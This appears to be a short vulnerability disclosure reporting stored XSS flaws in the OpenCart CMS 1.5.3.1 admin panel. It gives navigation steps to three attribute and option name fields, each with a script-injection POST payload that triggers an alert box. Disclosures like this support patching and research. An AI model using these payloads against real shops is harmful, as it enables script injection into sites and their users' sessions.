_ _ _ _____ _____ ____ _ _ ____ _ _ _ _____ | |/ | |___ / _ __|___ | / __ \ | | | | / __ \ | | | |/ |___ | / __) | | |_ \| '_ \ / / / / _` / __) __)/ / _` / __) __) | / / \__ \ | |___) | | | |/ / | | (_| \__ \__ \ | (_| \__ \__ \ | / / ( /_|_|____/|_| |_/_/ \ \__,_( ( /\ \__,_( ( /_|/_/ |_| \____/ |_| |_| \____/ |_| |_| ------------------------------------------------------------------- ------------------------------------------------------------------- TITLE: OpenCart CMS Multiple Stored XSS Vendor: OpenCart CMS Author: $1l3n7 @$$@$$17 Email: sil3ntb0t@gmail.com Download Link: http://www.opencart.com/index.php?route=download/download Versions: 1.5.3.1 Tested on: Windows 7 ------------------------------------------------------------------- ------------------------------------------------------------------- Description: OpenCart is an open source PHP-based online shopping cart system. A robust e-commerce solution for Internet merchants with the ability to create their own online business and participate in e-commerce at a minimal cost. OpenCart is designed feature rich, easy to use, search engine friendly and with a visually appealing interface. ------------------------------------------------------------------- ------------------------------------------------------------------- Multiple Persistent XSS: DEMO: 1: Select Catalog Drop Down -> Attribute Menu -> Select Attribute Select Insert Button In Attribute Name Field POST DATA= "'-->><script>alert(0)</script> Similarly Select Catalog Drop Down -> Attribute Menu -> Select Attribute Groups Select Insert Button In Attribute Group Name Field POST DATA= "'-->><script>alert(0)</script> 2: Select Catalog Drop Down -> Select Options Select Insert Button In Option Name Field POST DATA= "'-->><script>alert(0)</script> ------------------------------------------------------------- gr33t1ngs and ShOuTZ to r007k17-w and all my friends..